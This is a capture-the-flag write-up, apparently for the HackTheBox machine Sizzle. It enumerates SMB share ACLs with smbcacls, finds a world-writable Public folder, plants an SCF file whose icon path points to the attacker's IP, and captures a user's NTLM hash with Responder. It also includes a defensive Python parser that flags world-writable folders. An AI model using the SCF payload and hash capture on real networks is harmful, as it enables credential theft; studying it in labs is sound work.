Use of SMBcacls
The smbcacls program manipulates NT Access Control Lists (ACLs) on SMB file shares. An ACL comprises zero or more Access Control Entries (ACEs), which define access restrictions for a specific user or group.
Using smbcacls, we'll be able to list the permissions of a directory in an SMB share.
➜ sizzle smbcacls -N '//10.10.10.103/Department Shares' /users
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/0x0/READ
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
This shows the permissions of the users directory inside the Department Shares share.
We need to check the permissions of all the folders and subfolders and see whether we can both read and write to any directory.
We'll use a for loop for this.
Making a list of all the directories in a folder:
➜ sizzle for i in $(ls); do echo $i; done
Accounting
Audit
Banking
CEO_protected
Devops
Finance
HR
IT
Infosec
Infrastructure
Legal
M&A
Marketing
R&D
Sales
Security
Tax
Users
ZZ_ARCHIVE
Save the output in a file.
These are the directories in the Department Shares share.
Now we need to traverse all the folders inside them and check the permissions using smbcacls.
Creating a file:
cd /mnt/htb/sizzle/ && find . > ~/htb/sizzle/SMB/files.txt
Remove the leading ./ from every line using vim or bash.
The file should then look like this ->
➜ SMB cat files.txt
Accounting
Audit
Banking
Banking/Offshore
Banking/Offshore/Clients
Banking/Offshore/Data
Banking/Offshore/Dev
Banking/Offshore/Plans
Banking/Offshore/Sites
CEO_protected
Devops
Finance
HR
HR/Benefits
HR/Corporate Events
HR/New Hire Documents
HR/Payroll
HR/Policies
----SNIP----
while IFS= read -r i; do echo "$i"; smbcacls -N '//10.10.10.103/Department Shares' "$i"; done < files.txt
ACL:Everyone:ALLOWED/OI|CI/FULL
We can write to the public folder.
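The same listing can be checked from the share owner's side. The following Python sketch is an added example, not part of the original writeup: it parses the path-then-ACL output of the loop above and reports directories where a broad trustee such as Everyone holds write access. The function names, the BROAD trustee list and the sample input are assumptions made for illustration.

```python
# Added example: audit parser for the "echo path; smbcacls ..." loop output.
BROAD = {"everyone", "nt authority\\authenticated users", "builtin\\users"}  # assumed list; extend per domain
WRITE_NAMES = {"FULL", "CHANGE"}   # smbcacls shorthand masks that include write access
# FILE_ADD_FILE | FILE_ADD_SUBDIRECTORY | GENERIC_WRITE | GENERIC_ALL
WRITE_BITS = 0x2 | 0x4 | 0x40000000 | 0x10000000
HEADER = ("REVISION:", "CONTROL:", "OWNER:", "GROUP:")


def grants_write(mask):
    """True if a smbcacls mask (shorthand name, hex value, or RWXDPO letters) allows writing."""
    if mask in WRITE_NAMES:
        return True
    if mask.lower().startswith("0x"):
        return bool(int(mask, 16) & WRITE_BITS)
    return "W" in mask


def world_writable(stream):
    """Return [(path, trustee, flags, mask)] for ALLOWED ACEs that give a broad trustee write."""
    findings, path = [], None
    for line in stream.splitlines():
        line = line.strip()
        if not line or line.startswith(HEADER):
            continue
        if not line.startswith("ACL:"):
            path = line            # the loop echoes each path before its ACL dump
            continue
        trustee, _, ace = line[4:].rpartition(":")
        parts = ace.split("/")
        if len(parts) != 3:
            continue               # malformed ACE line: skip rather than guess
        ace_type, flags, mask = parts
        if ace_type == "ALLOWED" and trustee.lower() in BROAD and grants_write(mask):
            findings.append((path, trustee, flags, mask))
    return findings


# Constructed sample in the shape of the output above; header values are illustrative.
SAMPLE = """Users
REVISION:1
OWNER:BUILTIN\\Administrators
ACL:Everyone:ALLOWED/0x0/READ
ACL:BUILTIN\\Administrators:ALLOWED/OI|CI|I/FULL
Users/Public
REVISION:1
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:NT AUTHORITY\\SYSTEM:ALLOWED/OI|CI|I/FULL
"""

if __name__ == "__main__":
    for finding in world_writable(SAMPLE):
        print("world-writable:", *finding)
```

Any directory this reports is a place where an unauthenticated or low-privileged user can drop files, so it is a candidate for tightening the ACE to READ or to a narrower group.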
When we can upload a file to an SMB share, we can try an SCF attack. SCF (Shell Command File) files can be used to perform a limited set of operations, such as showing the Windows desktop or opening Windows Explorer. However, an SCF file can also be used to access a specific UNC path, which allows the penetration tester to build an attack. The code below can be placed inside a text file, which then needs to be planted on a network share.
This attack creates an alias, say an icon file, and states that the icon file is located at our IP address; when the server reaches out to our IP, we capture its hash.
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
Attack.scf ->
[Shell]
Command=2
IconFile=\\10.10.14.10\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I tun0
sudo cp attack.scf /mnt/htb/sizzle/Users/Public
Got the hash of the Amanda user.